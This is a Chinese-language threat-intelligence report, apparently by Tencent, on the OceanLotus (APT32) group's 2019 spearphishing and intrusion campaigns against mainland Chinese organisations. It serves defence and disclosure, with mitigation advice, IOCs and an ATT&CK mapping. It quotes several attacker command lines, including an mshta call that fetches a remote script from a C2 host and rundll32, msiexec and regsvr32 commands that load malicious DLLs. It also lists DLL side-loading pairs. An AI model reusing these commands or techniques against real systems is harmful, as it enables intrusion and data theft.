「海蓮花」(OceanLotus)組織2019年針對中國大陸的攻擊活動匯總

長按二維碼關注

御見威脅情報中心

目錄

一、概述

二、攻擊特點
1、釣魚郵件的迷惑性
2、誘餌類型的多樣化
3、載荷執行方式多變
4、與安全軟體對抗激烈
5、定製化的後門
6、多種惡意軟體的選擇
7、持續的內網滲透
三、可能存在的假旗活動
四、總結
五、安全建議
六、附錄
1、騰訊御見威脅情報中心
2、IOCs
3、MITRE ATT&CK
4、參考連結

一、概述

"海蓮花"（又名APT32、OceanLotus），被認為是來自越南的APT攻擊組織，自2012年活躍以來，一直針對中國大陸的敏感目標進行攻擊活動，是近幾年來針對中國大陸進行攻擊活動最活躍的APT攻擊組織，甚至沒有之一。

騰訊安全御見威脅情報中心曾在2019年上半年發布過海蓮花組織2019年第一季度攻擊活動報告，在報告發布之後一直到現在，我們監測到該組織針對中國大陸的攻擊持續活躍。該組織的攻擊目標眾多且廣泛，包括中國大陸的政府部門、海事機構、外交機構、大型國企、科研機構以及部分重要的私營企業等。並且我們監測到，有大量的國內目標被該組織攻擊而整個內網都淪陷，且有大量的機密資料、企業伺服器配置信息等被打包竊取。

此外我們發現，該組織攻擊人員非常熟悉我國，對我國的時事、新聞熱點、政府結構等都非常熟悉，如剛出個稅改革時候，就立馬使用個稅改革方案做為攻擊誘餌主題。此外釣魚主題還包括績效、薪酬、工作報告、總結報告等。

而從攻擊的手法上看，相對第一季度變化不是太大，但有一些小的改進，包括攻擊誘餌的種類、payload加載、繞過安全檢測等方面。而從整體攻擊方式來看，依然採用電子郵件投遞誘餌的方式，一旦獲得一臺機器的控制權後，立即對整個內網進行掃描和平移滲透攻擊等。這也進一步說明了APT攻擊活動不會因為被曝光而停止或者有所減弱，只要攻擊目標存在價值，攻擊會越來越猛烈，對抗也會越來越激烈。

有關海蓮花APT組織2019年對中國大陸攻擊情況的完整技術報告(11MB)，請從這裡下載：

https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf

二、攻擊特點

海蓮花組織擅長使用魚叉攻擊，通過大量精準發送釣魚郵件來投遞惡意附件的方式進行攻擊。整個2019年，持續對多個目標不斷的進行攻擊，如下列釣魚郵件：

從郵件主題來看，大部分郵件主題都非常本土化，以及貼近時事熱點。郵件主題包括：《定-關於報送2019年度經營業績考核目標建議材料的報告》、《組織部幹部四處最新通知更新》、《關於2019下半年增加工資實施方案的請示（待審）》、《2019年工作報告提綱2(第四稿)》、《2019年5月標準幹部培訓課程通知》等等。

我們在2019年第一季度的報告中還提到海蓮花組織採用敏感內容主題釣魚郵件，不過在之後的攻擊中並未再次發現使用該類型誘餌：

此外，投遞釣魚郵件的帳號均為網易郵箱，包括126郵箱和163郵箱，帳號樣式為：名字拼音+數字@163（126）.com，如：

Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。

海蓮花組織所使用的誘餌類型眾多，能想到的誘餌類型海蓮花幾乎都用過。除了我們在第一季度報告裡提到的白加黑、lnk、doc文檔、WinRAR ACE漏洞（CVE-2018-20250）的壓縮包等類型外，之後的攻擊中還新增了偽裝為word圖標的可執行文件、chm文件等。
可執行文件誘餌：

Chm誘餌：

白加黑誘餌：

 

帶有宏的惡意office文檔：

惡意lnk：

帶有WinRAR ACE（CVE-2018-20250）漏洞的壓縮包：

由於誘餌的多樣化，載荷執行的方式也多變。此外第二階段的加載方式同樣方式眾多。

1、直接執行可執行文件

如該誘餌，偽裝為word圖標的可執行文件，並在文件描述裡修改成了Microsoft DOCX，用於迷糊被釣魚者。執行惡意文件後，會釋放誘餌文檔2019年5月標準幹部培訓課程通知.docx，並且打開，讓受害者以為打開的就是word文檔。而打開後的文檔為模糊處理的文檔，誘使受害者啟用文檔中的宏代碼以查看文檔內容，實際上啟用宏之後，仍然看不到正常的內容：

2、使用rundll32加載惡意dll

如某誘餌在執行後，會在C:\Users\Administrator\AppData\Local\Microsoft目錄釋放真正的惡意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll，然後使用rundll32來執行該dll：

"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register
3、宏
使用宏來執行載荷，且宏代碼經過的混淆處理：

4、Office內存執行惡意shellcode
使用宏代碼，在office中直接解密shellcode，在內存中創建線程執行：

5、dll側加載（白加黑）
使用dll側加載（DLL Side-Loading）技術來執行載荷，通俗的講就是我們常說的白加黑執行。
其中所使用的宿主文件對包括：
白文件原名
黑dll文件名
iTunesHelper.exe
AppVersions.dll
SGTool.exe
Inetmib1.dll
Rar.exe
ldvptask.ocx
GoogleUpdate.exe
goopdate.dll
360se.exe
chrome_elf.dll
Winword.exe
wwlib.dll
rekeywiz.exe
mpr.dll
wps.exe
krpt.dll
wechat.exe
WeChatWin.dll

6、通過com技術執行
通過com技術，把某惡意dll註冊為系統組建來執行：

7、Chm內嵌腳本
Chm執行後，會提示執行ActiveX代碼：

其腳本內容為：

不過由於編碼處理的問題，該chm打開後為亂碼：

而通過手動解壓後，原始內容如下：

8、使用計劃任務進行持久性攻擊
如上面的chm誘餌執行後，會在%AppData%\Roaming下釋放文件bcdsrv.dll，然後創建名為MonthlyMaintenance的計劃任務：
命令行為：
C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll
bcdsrv.dll為真正的惡意文件。
9、lnk調用mstha執行
該方法的詳細分析在之前的《海蓮花2019年第一季度攻擊披露》：
執行lnk後，會調用命令：
C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html
而news.html實際為一個vbs腳本文件。
10、使用odbcconf.exe加載文件
odbcconf.exe為系統自帶的一個文件，該文件可以用來執行dll文件，而由於宿主進程為系統文件，因此可以逃避一些安全軟體的攔截：

11、WinRAR ACE（CVE-2018-20250）漏洞
帶有該漏洞的壓縮包，可以構造為：解壓後除了會解壓出正常的文件外，再在啟動目錄（C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup）釋放一個自解壓文件：
該文件為一個自解壓程序，等啟動後，會釋放一個{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件，然後執行命令：
regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx
我們在最新的攻擊活動中，我們首次發現海蓮花使用了多重載荷的攻擊。之前的攻擊活動中，都是解密shellcode後，就直接執行最終的RAT，如：

而在最新的攻擊活動中，我們發現，解密shellcode後，會先下載shellcode執行，如果下載不成功，再來加載預先設定好的RAT：
這樣使得攻擊活動更加的豐富和多樣性，並且也可控。
海蓮花也採用了多種對抗安全軟體的方式，主要為：
1、dll的側加載（白加黑）
該技術上面已詳細描述，這裡不再贅述。
2、使用系統文件來執行：
如odbcconf.exe
3、Office中直接內存執行shellcode
上文也已經描述，這裡也不再展開。
4、添加垃圾數據以擴充文件大小
為了防止該文件被安全廠商收集，海蓮花組織特意在某些文件的資源中添加大量的垃圾數據的方式以擴充文件大小。
如某文件，填充垃圾數據後，文件大小高達61.4 MB (64,480,256 字節)：

5、每臺機器的第二階段後門都是定製的
每臺機器的第二階段後門文件都是根據當前機器的機器屬性（如機器名）來加密定製的，因此每臺機器上的文件hash都是不一樣，且沒這臺機器的相關信息則無法解密。因此且即便被安全廠商捕捉，只要沒有這臺機器的相關遙感數據就無法解密出真正的payload。詳細的見後文的"定製化後門"部分。
6、通信的偽裝
如某次攻擊中C2的偽裝：根據配置信息，可進行不同的連接和偽裝，對C2進行拼裝後再進行解析。拼接方式為（xxx為配置C2）：
{rand}.xxx
www6.xxx
cdn.xxx
api.xxx

HTTP Header的偽裝：
使用定製化的後門（主要是第二階段下發的後門），海蓮花組織在2019年所使用的技術中最令人印象深刻的。該技術我們曾經在《2019年海蓮花第一季度攻擊報告》中首次曝光：針對每臺機器下發的惡意文件，都使用被下發機器的相關機器屬性（如機器名）進行加密，而執行則需要該部分信息，否則無法解密。
因此每個下發的惡意文件都不一樣，而且即便被安全廠商捕捉，只要沒有該機器的相關遙感數據就無法解密出真正的payload。
該後門最終使用白加黑的方式來執行，包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、XGFileCheck.exe+goopdate.dll、SogouCloud.exe+ inetmib1.dll等組合來執行。
加密流程為：

可以看到，某次針對國家某單位的攻擊中，使用的密鑰為：
而該受害的用戶名為Cao**，可見該木馬只專門為了感染該電腦而特意生成的。
從我們的長期跟蹤結果來看，海蓮花組織使用最終的惡意軟體（無論是第一階段後門還是第二階段後門）主要有三種，分別是CobaltStrike的beacon木馬、Denis家族木馬、修改版的Gh0st。其中CobaltStrike和Denis使用的最多，而修改版的Gh0st則比較少見。
CobaltStrike：

Denis：

修改版Gh0st：
通過釣魚攻擊攻陷一臺主機後，海蓮花還會不斷對被攻擊的內網進行滲透攻擊活動，以此來滲透到更多的內網機器：
掃描：

獲取hash：

打包文件：

此外，還會還會通過powershell，創建計劃任務來下載持久化的工具：
最終的惡意文件為goopdate.dll，跟上文所述的第二階段下發後門一致。
三、可能存在的假旗活動
在跟蹤海蓮花的過程中，我們還發現了一些跟海蓮花活動類似的攻擊：
如:


可以看出該批活動跟海蓮花的類似：如關鍵字、使用白加黑等。

而該文件最終的執行的惡意代碼為兩種：
一種是CobaltStrike生成的Beacon payload；
另一種是metasploit生成的block_reverse_http的paylaod。
雖然CobaltStrike的Beacon木馬海蓮花組織一直在進行使用，但是之前未發現有metasploit生成的payload，這似乎跟之前的海蓮花攻擊活動又有些不一致。
此外該批活動的c2都在中國境內（包括中國香港），這似乎跟之前的攻擊活動也不大一樣：
雖然這波活動在極力模仿海蓮花的一些攻擊行為，但是也依然存在不同的地方。因此暫未有更多的證據可以表明該活動歸屬於海蓮花還是其他組織使用的假旗（false flag）活動。因此在這先不做定論，等待更多的證據和關聯的依據。
四、總結
海蓮花組織是近年來針對中國大陸的敏感部門進行攻擊最活躍的APT組織，甚至沒有之一。當然該組織也是被安全公司曝光的針對中國大陸攻擊活動報告最多的APT攻擊組織。儘管被安全廠商頻繁曝光，該組織並未有停手跡象，反而不斷更新其技術和武器庫，包括誘餌、payload、新的漏洞利用等，此外也有眾多跟殺軟的對抗手段，如自增文件大小、混淆方式、定製化的payload等。
因此我們提醒相關部門和相關人員，切記提高安全意識，不要隨意執行來歷不明的郵件的附件，不要被釣魚信息所蒙蔽。
五、安全建議
1、提升安全意識，不要打開來歷不明的郵件的附件；除非文檔來源可靠，用途明確，否則不要輕易啟用Office的宏代碼；
2、及時安裝作業系統補丁和Office等重要軟體的補丁；
3、使用殺毒軟體防禦可能得病毒木馬攻擊，對於企業用戶，推薦使用騰訊御點終端安全管理系統。騰訊御點內置全網漏洞修復和病毒防禦功能，可幫助企業用戶降低病毒木馬入侵風險；

4、推薦企業用戶部署騰訊御界高級威脅檢測系統及時捕捉黑客攻擊。御界高級威脅檢測系統，是基於騰訊安全反病毒實驗室的安全能力、依託騰訊在雲和端的海量數據，研發出的獨特威脅情報和惡意檢測模型系統。（https://s.tencent.com/product/gjwxjc/index.html）
六、附錄

MD5：
e7920ac10815428de937f2fca076b94c
4095b9682af13ca1e897ca9cc097ec69
b96de3d0023542f8624b82b9773373e9
5c5f8c80dcb3283afeb092cb0c13a58a
c90c7abcee1d98a8663904d739185d16
d249411f003d05c0cea012c11ba13716
3489140891e67807c550aa91c67dc4ad
22f8736bbc96c1a58ab07326d730a235
dade969b00cbc4a0c1b58eeb0e740b63
3c3b2cc9ff5d7030fb01496510ac75f2
d604c33d6ec99a87a672b3202cb60fa7
861fc5624fd1920e9d9cc7a236817dd7
8e2b5b95980cf52e99acfa95f5e1570b
3c8b2d20e428f8207b4324bb58f5d228
a81424e973b310edd50aed37590f4b8a
cf5d6d28c388edf58e55412983cf804a
6b8bec74620fbf88263b48c5a11b682e
9eb55481a0b5fcd255c8fb8de1042f88
5c00063b11c4710fe5a5a1adaf208b12
d30bc57624d233d94dc53a62908ef2df
886d0dd67e4cf132a1aed84263d661e3
2b3c5c831eb6b921ac128c4d44d70a7a
1dfb41e5919af80c7d0fa163a90e21e5

C&C：
360skylar.host
wechats.asis
news.shangrilaexports.com
clip.shangweidesign.com
jcdn.jsoid.com
libjs.inquirerjs.com
baidu-search.net
sys.genevrebreinl.com
ad.ssageevrenue.com
tel.caitlynwells.com
us.melvillepitcairn.com
upgrade.coldriverhardware.com
cdnwebmedia.com
43.251.100.20
43.254.217.67
114.118.80.233
Tactic
ID
Name
Initial Access
T1193
Spearphishing Attachment
Execution
T1106
Execution through API

T1129
Execution through Module Load

T1203
Exploitation for Client  Execution

T1085
Rundll32

T1204
User Execution

T1223
Compiled HTML File

T1053
Scheduled Task

T1117
Regsvr32
Persistence
T1179
Hooking

T1053
Scheduled Task

T1060
Registry Run Keys / Startup  Folder
Defense Evasion
T1107
File Deletion

T1140
Deobfuscate/Decode Files or Information

T1036
Masquerading

T1112
Modify Registry

T1027
Obfuscated Files or  Information

T1085
Rundll32

T1099
Timestomp

T1117
Regsvr32
Credential Access
T1179
Hooking

T1056
Input Capture
Discovery
T1083
File and Directory Discovery

T1046
Network Service Scanning

T1135
Network Share Discovery

T1057
Process Discovery

T1082
System Information Discovery

T1007
System Service Discovery
Lateral Movement
T1534
Internal Spearphishing
Collection
T1005
Data from Local System

T1025
Data from Removable Media

T1123
Audio Capture

T1056
Input Capture

T1113
Screen Capture

T1115
Clipboard Data
Command and Control
T1043
Commonly Used Port

T1094
Custom Command and Control  Protocol

T1024
Custom Cryptographic Protocol

T1001
Data Obfuscation

T1065
Uncommonly Used Port
https://s.tencent.com/research/report/715.html
點擊閱讀原文，可下載完整技術報告（11MB）。